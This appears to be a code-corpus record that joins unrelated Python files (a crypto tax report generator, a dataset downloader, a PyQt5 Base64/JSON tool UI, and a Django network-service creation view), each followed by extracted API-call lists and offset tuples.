# With transaction list, we now generate the events and tax map
try:
reportData = taxmap.buildTaxMap(txData, args.wallet, datetime.datetime.strptime(args.startDate, '%Y-%m-%d').date(), datetime.datetime.strptime(args.endDate, '%Y-%m-%d').date(), costBasis, includedChains, moreOptions)
except Exception as err:
logging.error('Unexpected Error {0} building tax map, setting report to failure.'.format(err))
traceback.print_exc()
# Set a different code when web3.exceptions.TransactionNotFound
# so we can relay that it is about network rpc issue, try later
if str(err) == "{'message': 'Relay attempts exhausted', 'code': -32050}":
statusCode = 8
elif "Bad Gateway for url" in str(err) or "Service Unavailable" in str(err) or "Max retries exceeded" in str(err):
statusCode = 8
else:
statusCode = 9
try:
db.updateReportError(args.wallet, args.startDate, args.endDate, statusCode)
except Exception as err:
logging.error('DB report update error failure: {0}'.format(str(err)))
return 1
for item in reportData['taxes']:
logging.debug(str(item.__dict__) + '\n')
# The results are written to a file and record updated to notify completion
reportFile = uuid.uuid4().hex
with open('../reports/{0}'.format(reportFile), 'wb') as f:
pickle.dump(reportData, f)
try:
db.completeReport(args.wallet, args.startDate, args.endDate, reportFile)
except Exception as err:
logging.error('DB report update complete failure: {0}'.format(str(err)))
if __name__ == "__main__":
main()
| [
"transactions.getTransactionCount",
"logging.info",
"db.findReport",
"argparse.ArgumentParser",
"transactions.getTransactionList",
"db.updateReportError",
"traceback.print_exc",
"jsonpickle.loads",
"logging.handlers.RotatingFileHandler",
"pickle.load",
"logging.warning",
"db.ReportOptions",
... | [((243, 333), 'logging.handlers.RotatingFileHandler', 'logging.handlers.RotatingFileHandler', (['"""../main.log"""'], {'maxBytes': '(33554432)', 'backupCount': '(10)'}), "('../main.log', maxBytes=33554432,\n backupCount=10)\n", (279, 333), False, 'import logging\n'), ((334, 494), 'logging.basicConfig', 'logging.basicConfig', ([], {'handlers': '[handler]', 'level': 'logging.INFO', 'format': '"""%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s"""', 'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "(handlers=[handler], level=logging.INFO, format=\n '%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt=\n '%Y-%m-%d %H:%M:%S')\n", (353, 494), False, 'import logging\n'), ((489, 528), 'logging.info', 'logging.info', (['"""We got a report request"""'], {}), "('We got a report request')\n", (501, 528), False, 'import logging\n'), ((542, 567), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (565, 567), False, 'import argparse\n'), ((1313, 1331), 'db.ReportOptions', 'db.ReportOptions', ([], {}), '()\n', (1329, 1331), False, 'import db\n'), ((1429, 1485), 'db.findReport', 'db.findReport', (['args.wallet', 'args.startDate', 'args.endDate'], {}), '(args.wallet, args.startDate, args.endDate)\n', (1442, 1485), False, 'import db\n'), ((4925, 4937), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (4935, 4937), False, 'import uuid\n'), ((5013, 5039), 'pickle.dump', 'pickle.dump', (['reportData', 'f'], {}), '(reportData, f)\n', (5024, 5039), False, 'import pickle\n'), ((5057, 5129), 'db.completeReport', 'db.completeReport', (['args.wallet', 'args.startDate', 'args.endDate', 'reportFile'], {}), '(args.wallet, args.startDate, args.endDate, reportFile)\n', (5074, 5129), False, 'import db\n'), ((1701, 1718), 'pickle.load', 'pickle.load', (['file'], {}), '(file)\n', (1712, 1718), False, 'import pickle\n'), ((1881, 1904), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1902, 1904), False, 'import datetime\n'), ((1928, 1973), 'transactions.getTransactionCount', 'transactions.getTransactionCount', (['args.wallet'], {}), '(args.wallet)\n', (1960, 1973), False, 'import transactions\n'), ((2730, 2835), 'transactions.getTransactionList', 'transactions.getTransactionList', (['args.wallet', 'args.startDate', 'args.endDate', 'page_size', 'includedChains'], {}), '(args.wallet, args.startDate, args.endDate,\n page_size, includedChains)\n', (2761, 2835), False, 'import transactions\n'), ((3237, 3249), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (3247, 3249), False, 'import uuid\n'), ((3344, 3366), 'pickle.dump', 'pickle.dump', (['txData', 'f'], {}), '(txData, f)\n', (3355, 3366), False, 'import pickle\n'), ((3392, 3480), 'db.completeTransactions', 'db.completeTransactions', (['args.wallet', 'args.startDate', 'args.endDate', 'transactionsFile'], {}), '(args.wallet, args.startDate, args.endDate,\n transactionsFile)\n', (3415, 3480), False, 'import db\n'), ((4041, 4062), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (4060, 4062), False, 'import traceback\n'), ((2269, 2301), 'jsonpickle.loads', 'jsonpickle.loads', (['reportInfo[13]'], {}), '(reportInfo[13])\n', (2285, 2301), False, 'import jsonpickle\n'), ((2993, 3014), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (3012, 3014), False, 'import traceback\n'), ((3027, 3093), 'db.updateReportError', 'db.updateReportError', (['args.wallet', 'args.startDate', 'args.endDate', '(8)'], {}), '(args.wallet, args.startDate, args.endDate, 8)\n', (3047, 3093), False, 'import db\n'), ((4532, 4607), 'db.updateReportError', 'db.updateReportError', (['args.wallet', 'args.startDate', 'args.endDate', 'statusCode'], {}), '(args.wallet, args.startDate, args.endDate, statusCode)\n', (4552, 4607), False, 'import db\n'), ((2080, 2121), 'datetime.datetime.timestamp', 'datetime.datetime.timestamp', (['generateTime'], {}), '(generateTime)\n', (2107, 2121), False, 'import datetime\n'), ((2355, 2449), 'logging.warning', 'logging.warning', (['"""Ignoring failure to load more options, probably old ui not setting it."""'], {}), "(\n 'Ignoring failure to load more options, probably old ui not setting it.')\n", (2370, 2449), False, 'import logging\n'), ((3737, 3791), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['args.startDate', '"""%Y-%m-%d"""'], {}), "(args.startDate, '%Y-%m-%d')\n", (3763, 3791), False, 'import datetime\n'), ((3800, 3852), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['args.endDate', '"""%Y-%m-%d"""'], {}), "(args.endDate, '%Y-%m-%d')\n", (3826, 3852), False, 'import datetime\n')] |
"""データセットをダウンロードするためのスクリプトです."""
# default packages
import logging
import pathlib
import traceback
import urllib.request as request
# third party
import pandas as pd
import tqdm as tqdm_std
# my packages
import src.data.directory as directory
# logger
logger = logging.getLogger(__name__)
class TqdmUpTo(tqdm_std.tqdm):
"""Provides `update_to(n)` which uses `tqdm.update(delta_n)`.
Args:
tqdm (tqdm): tqdm
"""
def update_to(self, b: int = 1, bsize: int = 1, tsize: int = None) -> None:
""" update function
Args:
b (int, optional): Number of blocks transferred. Defaults to 1.
bsize (int, optional): Size of each block (in tqdm units). Defaults to 1.
tsize ([type], optional): Total size (in tqdm units). Defaults to None.
"""
if tsize is not None:
self.total = tsize
self.update(b * bsize - self.n)
def get_raw_filepath() -> pathlib.Path:
url = get_raw_url()
filepath = directory.get_raw().joinpath(url.split("/")[-1])
return filepath
def get_raw_url() -> str:
url = (
"https://storage.googleapis.com/tensorflow/tf-keras-datasets/"
"jena_climate_2009_2016.csv.zip"
)
return url
def _main() -> None:
"""メインの実行スクリプト."""
logging.basicConfig(level=logging.INFO)
filepath = get_raw_filepath()
if filepath.exists() is False:
url = get_raw_url()
filepath.parent.mkdir(exist_ok=True, parents=True)
with TqdmUpTo(
unit="B", unit_scale=True, miniters=1, desc=filepath.name
) as pbar:
request.urlretrieve(
url, filename=filepath, reporthook=pbar.update_to, data=None
)
else:
logger.info(f"data already exists: {filepath}")
# show dataset description.
df = pd.read_csv(filepath)
logger.info(df.info())
logger.info(df.head())
logger.info(df.tail())
if __name__ == "__main__":
try:
_main()
except Exception as e:
logger.error(e)
logger.error(traceback.format_exc())
| [
"logging.getLogger",
"logging.basicConfig",
"traceback.format_exc",
"pandas.read_csv",
"urllib.request.urlretrieve",
"src.data.directory.get_raw"
] | [((264, 291), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (281, 291), False, 'import logging\n'), ((1292, 1331), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (1311, 1331), False, 'import logging\n'), ((1833, 1854), 'pandas.read_csv', 'pd.read_csv', (['filepath'], {}), '(filepath)\n', (1844, 1854), True, 'import pandas as pd\n'), ((1000, 1019), 'src.data.directory.get_raw', 'directory.get_raw', ([], {}), '()\n', (1017, 1019), True, 'import src.data.directory as directory\n'), ((1613, 1699), 'urllib.request.urlretrieve', 'request.urlretrieve', (['url'], {'filename': 'filepath', 'reporthook': 'pbar.update_to', 'data': 'None'}), '(url, filename=filepath, reporthook=pbar.update_to, data\n =None)\n', (1632, 1699), True, 'import urllib.request as request\n'), ((2062, 2084), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (2082, 2084), False, 'import traceback\n')] |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'F:\work\code\pyqt5\ui\main.ui'
#
# Created by: PyQt5 UI code generator 5.9
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(963, 727)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.tabWidget.sizePolicy().hasHeightForWidth())
self.tabWidget.setSizePolicy(sizePolicy)
self.tabWidget.setMinimumSize(QtCore.QSize(571, 0))
self.tabWidget.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.verticalLayout = QtWidgets.QVBoxLayout(self.tab)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(self.tab)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.txtRaw = QtWidgets.QTextEdit(self.tab)
self.txtRaw.setObjectName("txtRaw")
self.verticalLayout.addWidget(self.txtRaw)
self.groupBox = QtWidgets.QGroupBox(self.tab)
self.groupBox.setMinimumSize(QtCore.QSize(0, 0))
self.groupBox.setMaximumSize(QtCore.QSize(500, 16777215))
self.groupBox.setObjectName("groupBox")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.groupBox)
self.horizontalLayout.setObjectName("horizontalLayout")
self.btnEncoding = QtWidgets.QPushButton(self.groupBox)
self.btnEncoding.setObjectName("btnEncoding")
self.horizontalLayout.addWidget(self.btnEncoding)
self.btnDecoding = QtWidgets.QPushButton(self.groupBox)
self.btnDecoding.setObjectName("btnDecoding")
self.horizontalLayout.addWidget(self.btnDecoding)
self.btnExchange = QtWidgets.QPushButton(self.groupBox)
self.btnExchange.setObjectName("btnExchange")
self.horizontalLayout.addWidget(self.btnExchange)
self.btnClear = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnClear.sizePolicy().hasHeightForWidth())
self.btnClear.setSizePolicy(sizePolicy)
self.btnClear.setObjectName("btnClear")
self.horizontalLayout.addWidget(self.btnClear)
self.cboxCodecType = QtWidgets.QComboBox(self.groupBox)
self.cboxCodecType.setObjectName("cboxCodecType")
self.cboxCodecType.addItem("")
self.horizontalLayout.addWidget(self.cboxCodecType)
self.verticalLayout.addWidget(self.groupBox)
self.label_2 = QtWidgets.QLabel(self.tab)
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.label_2)
self.txtResult = QtWidgets.QTextEdit(self.tab)
self.txtResult.setObjectName("txtResult")
self.verticalLayout.addWidget(self.txtResult)
self.tabWidget.addTab(self.tab, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.tab_2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.txtJson = QtWidgets.QTextEdit(self.tab_2)
self.txtJson.setObjectName("txtJson")
self.verticalLayout_2.addWidget(self.txtJson)
self.groupBox_2 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_2.setMinimumSize(QtCore.QSize(0, 50))
self.groupBox_2.setObjectName("groupBox_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.groupBox_2)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.btnJsonFormat = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonFormat.setObjectName("btnJsonFormat")
self.horizontalLayout_2.addWidget(self.btnJsonFormat)
self.btnJsonCompress = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonCompress.setObjectName("btnJsonCompress")
self.horizontalLayout_2.addWidget(self.btnJsonCompress)
self.btnJsonEscape = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonEscape.setObjectName("btnJsonEscape")
self.horizontalLayout_2.addWidget(self.btnJsonEscape)
self.btnJsonDeescape = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonDeescape.setObjectName("btnJsonDeescape")
self.horizontalLayout_2.addWidget(self.btnJsonDeescape)
self.btnJsonCopy = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonCopy.setObjectName("btnJsonCopy")
self.horizontalLayout_2.addWidget(self.btnJsonCopy)
self.btnJsonClear = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonClear.setObjectName("btnJsonClear")
self.horizontalLayout_2.addWidget(self.btnJsonClear)
self.verticalLayout_2.addWidget(self.groupBox_2)
self.tabWidget.addTab(self.tab_2, "")
self.gridLayout.addWidget(self.tabWidget, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 963, 23))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
self.btnClear.clicked.connect(self.txtResult.clear)
self.btnClear.clicked.connect(self.txtRaw.clear)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label.setText(_translate("MainWindow", "Raw Text:"))
self.groupBox.setTitle(_translate("MainWindow", "Operation"))
self.btnEncoding.setText(_translate("MainWindow", "Encoding"))
self.btnDecoding.setText(_translate("MainWindow", "Decoding"))
self.btnExchange.setText(_translate("MainWindow", "Exchange"))
self.btnClear.setText(_translate("MainWindow", "Clear"))
self.cboxCodecType.setItemText(0, _translate("MainWindow", "Base64"))
self.label_2.setText(_translate("MainWindow", "Result Text:"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Codec"))
self.groupBox_2.setTitle(_translate("MainWindow", "Operation"))
self.btnJsonFormat.setText(_translate("MainWindow", "Format"))
self.btnJsonCompress.setText(_translate("MainWindow", "Compress"))
self.btnJsonEscape.setText(_translate("MainWindow", "Escape"))
self.btnJsonDeescape.setText(_translate("MainWindow", "De-Escape"))
self.btnJsonCopy.setText(_translate("MainWindow", "Copy"))
self.btnJsonClear.setText(_translate("MainWindow", "Clear"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Json"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| [
"PyQt5.QtWidgets.QWidget",
"PyQt5.QtWidgets.QTextEdit",
"PyQt5.QtWidgets.QMainWindow",
"PyQt5.QtWidgets.QComboBox",
"PyQt5.QtCore.QMetaObject.connectSlotsByName",
"PyQt5.QtWidgets.QHBoxLayout",
"PyQt5.QtWidgets.QVBoxLayout",
"PyQt5.QtWidgets.QGridLayout",
"PyQt5.QtWidgets.QStatusBar",
"PyQt5.QtWid... | [((7848, 7880), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (7870, 7880), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((7898, 7921), 'PyQt5.QtWidgets.QMainWindow', 'QtWidgets.QMainWindow', ([], {}), '()\n', (7919, 7921), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((432, 461), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', (['MainWindow'], {}), '(MainWindow)\n', (449, 461), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((546, 587), 'PyQt5.QtWidgets.QGridLayout', 'QtWidgets.QGridLayout', (['self.centralwidget'], {}), '(self.centralwidget)\n', (567, 587), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((665, 705), 'PyQt5.QtWidgets.QTabWidget', 'QtWidgets.QTabWidget', (['self.centralwidget'], {}), '(self.centralwidget)\n', (685, 705), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((727, 819), 'PyQt5.QtWidgets.QSizePolicy', 'QtWidgets.QSizePolicy', (['QtWidgets.QSizePolicy.Preferred', 'QtWidgets.QSizePolicy.Preferred'], {}), '(QtWidgets.QSizePolicy.Preferred, QtWidgets.\n QSizePolicy.Preferred)\n', (748, 819), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1235, 1254), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', ([], {}), '()\n', (1252, 1254), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1323, 1354), 'PyQt5.QtWidgets.QVBoxLayout', 'QtWidgets.QVBoxLayout', (['self.tab'], {}), '(self.tab)\n', (1344, 1354), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1436, 1462), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.tab'], {}), '(self.tab)\n', (1452, 1462), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1577, 1606), 'PyQt5.QtWidgets.QTextEdit', 'QtWidgets.QTextEdit', (['self.tab'], {}), '(self.tab)\n', (1596, 1606), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1726, 1755), 'PyQt5.QtWidgets.QGroupBox', 'QtWidgets.QGroupBox', (['self.tab'], {}), '(self.tab)\n', (1745, 1755), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1959, 1995), 'PyQt5.QtWidgets.QHBoxLayout', 'QtWidgets.QHBoxLayout', (['self.groupBox'], {}), '(self.groupBox)\n', (1980, 1995), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2087, 2123), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox'], {}), '(self.groupBox)\n', (2108, 2123), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2263, 2299), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox'], {}), '(self.groupBox)\n', (2284, 2299), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2439, 2475), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox'], {}), '(self.groupBox)\n', (2460, 2475), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2612, 2648), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox'], {}), '(self.groupBox)\n', (2633, 2648), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2670, 2760), 'PyQt5.QtWidgets.QSizePolicy', 'QtWidgets.QSizePolicy', (['QtWidgets.QSizePolicy.Minimum', 'QtWidgets.QSizePolicy.Preferred'], {}), '(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.\n Preferred)\n', (2691, 2760), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3105, 3139), 'PyQt5.QtWidgets.QComboBox', 'QtWidgets.QComboBox', (['self.groupBox'], {}), '(self.groupBox)\n', (3124, 3139), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3373, 3399), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.tab'], {}), '(self.tab)\n', (3389, 3399), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3523, 3552), 'PyQt5.QtWidgets.QTextEdit', 'QtWidgets.QTextEdit', (['self.tab'], {}), '(self.tab)\n', (3542, 3552), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3722, 3741), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', ([], {}), '()\n', (3739, 3741), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3816, 3849), 'PyQt5.QtWidgets.QVBoxLayout', 'QtWidgets.QVBoxLayout', (['self.tab_2'], {}), '(self.tab_2)\n', (3837, 3849), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3937, 3968), 'PyQt5.QtWidgets.QTextEdit', 'QtWidgets.QTextEdit', (['self.tab_2'], {}), '(self.tab_2)\n', (3956, 3968), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4095, 4126), 'PyQt5.QtWidgets.QGroupBox', 'QtWidgets.QGroupBox', (['self.tab_2'], {}), '(self.tab_2)\n', (4114, 4126), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4273, 4311), 'PyQt5.QtWidgets.QHBoxLayout', 'QtWidgets.QHBoxLayout', (['self.groupBox_2'], {}), '(self.groupBox_2)\n', (4294, 4311), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4409, 4447), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox_2'], {}), '(self.groupBox_2)\n', (4430, 4447), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4599, 4637), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox_2'], {}), '(self.groupBox_2)\n', (4620, 4637), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4793, 4831), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox_2'], {}), '(self.groupBox_2)\n', (4814, 4831), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4983, 5021), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox_2'], {}), '(self.groupBox_2)\n', (5004, 5021), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5175, 5213), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox_2'], {}), '(self.groupBox_2)\n', (5196, 5213), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5356, 5394), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox_2'], {}), '(self.groupBox_2)\n', (5377, 5394), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5756, 5786), 'PyQt5.QtWidgets.QMenuBar', 'QtWidgets.QMenuBar', (['MainWindow'], {}), '(MainWindow)\n', (5774, 5786), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5964, 5996), 'PyQt5.QtWidgets.QStatusBar', 'QtWidgets.QStatusBar', (['MainWindow'], {}), '(MainWindow)\n', (5984, 5996), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6302, 6351), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['MainWindow'], {}), '(MainWindow)\n', (6339, 6351), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1072, 1092), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(571)', '(0)'], {}), '(571, 0)\n', (1084, 1092), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1132, 1164), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(16777215)', '(16777215)'], {}), '(16777215, 16777215)\n', (1144, 1164), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1793, 1811), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(0)', '(0)'], {}), '(0, 0)\n', (1805, 1811), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1850, 1877), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(500)', '(16777215)'], {}), '(500, 16777215)\n', (1862, 1877), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4166, 4185), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(0)', '(50)'], {}), '(0, 50)\n', (4178, 4185), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5820, 5847), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(0)', '(0)', '(963)', '(23)'], {}), '(0, 0, 963, 23)\n', (5832, 5847), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n')] |
# Copyright 2018 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from drf_yasg.utils import swagger_auto_schema
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from lcm.ns.biz.ns_create import CreateNSService
from lcm.ns.biz.ns_get import GetNSInfoService
from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsReqSerializer
from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsRespSerializer
from lcm.ns.serializers.deprecated.ns_serializers import _QueryNsRespSerializer
from lcm.pub.exceptions import NSLCMException
from lcm.pub.exceptions import BadRequestException
from lcm.pub.utils.values import ignore_case_get
from .common import view_safe_call_with_log
logger = logging.getLogger(__name__)
class CreateNSView(APIView):
@swagger_auto_schema(
request_body=None,
responses={
status.HTTP_200_OK: _QueryNsRespSerializer(help_text="NS instances", many=True),
status.HTTP_500_INTERNAL_SERVER_ERROR: "Inner error"
}
)
@view_safe_call_with_log(logger=logger)
def get(self, request):
logger.debug("CreateNSView::get")
ret = GetNSInfoService().get_ns_info()
logger.debug("CreateNSView::get::ret=%s", ret)
resp_serializer = _QueryNsRespSerializer(data=ret, many=True)
if not resp_serializer.is_valid():
raise NSLCMException(resp_serializer.errors)
return Response(data=resp_serializer.data, status=status.HTTP_200_OK)
@swagger_auto_schema(
request_body=_CreateNsReqSerializer(),
responses={
status.HTTP_201_CREATED: _CreateNsRespSerializer(),
status.HTTP_400_BAD_REQUEST: "Bad Request",
status.HTTP_500_INTERNAL_SERVER_ERROR: "Inner error"
}
)
@view_safe_call_with_log(logger=logger)
def post(self, request):
logger.debug("Enter CreateNS: %s", request.data)
req_serializer = _CreateNsReqSerializer(data=request.data)
if not req_serializer.is_valid():
raise BadRequestException(req_serializer.errors)
if ignore_case_get(request.data, 'test') == "test":
return Response(
data={'nsInstanceId': "test"},
status=status.HTTP_201_CREATED
)
csar_id = ignore_case_get(request.data, 'csarId')
ns_name = ignore_case_get(request.data, 'nsName')
description = ignore_case_get(request.data, 'description')
context = ignore_case_get(request.data, 'context')
ns_inst_id = CreateNSService(
csar_id,
ns_name,
description,
context
).do_biz()
logger.debug("CreateNSView::post::ret={'nsInstanceId':%s}", ns_inst_id)
resp_serializer = _CreateNsRespSerializer(
data={'nsInstanceId': ns_inst_id,
'nsInstanceName': 'nsInstanceName',
'nsInstanceDescription': 'nsInstanceDescription',
'nsdId': 123,
'nsdInfoId': 456,
'nsState': 'NOT_INSTANTIATED',
'_links': {'self': {'href': 'href'}}})
if not resp_serializer.is_valid():
raise NSLCMException(resp_serializer.errors)
return Response(data=resp_serializer.data, status=status.HTTP_201_CREATED)
| [
"logging.getLogger",
"lcm.ns.serializers.deprecated.ns_serializers._CreateNsReqSerializer",
"lcm.pub.utils.values.ignore_case_get",
"lcm.ns.biz.ns_create.CreateNSService",
"lcm.ns.serializers.deprecated.ns_serializers._CreateNsRespSerializer",
"lcm.ns.serializers.deprecated.ns_serializers._QueryNsRespSeri... | [((1305, 1332), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1322, 1332), False, 'import logging\n'), ((1853, 1896), 'lcm.ns.serializers.deprecated.ns_serializers._QueryNsRespSerializer', '_QueryNsRespSerializer', ([], {'data': 'ret', 'many': '(True)'}), '(data=ret, many=True)\n', (1875, 1896), False, 'from lcm.ns.serializers.deprecated.ns_serializers import _QueryNsRespSerializer\n'), ((2012, 2074), 'rest_framework.response.Response', 'Response', ([], {'data': 'resp_serializer.data', 'status': 'status.HTTP_200_OK'}), '(data=resp_serializer.data, status=status.HTTP_200_OK)\n', (2020, 2074), False, 'from rest_framework.response import Response\n'), ((2525, 2566), 'lcm.ns.serializers.deprecated.ns_serializers._CreateNsReqSerializer', '_CreateNsReqSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (2547, 2566), False, 'from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsReqSerializer\n'), ((2886, 2925), 'lcm.pub.utils.values.ignore_case_get', 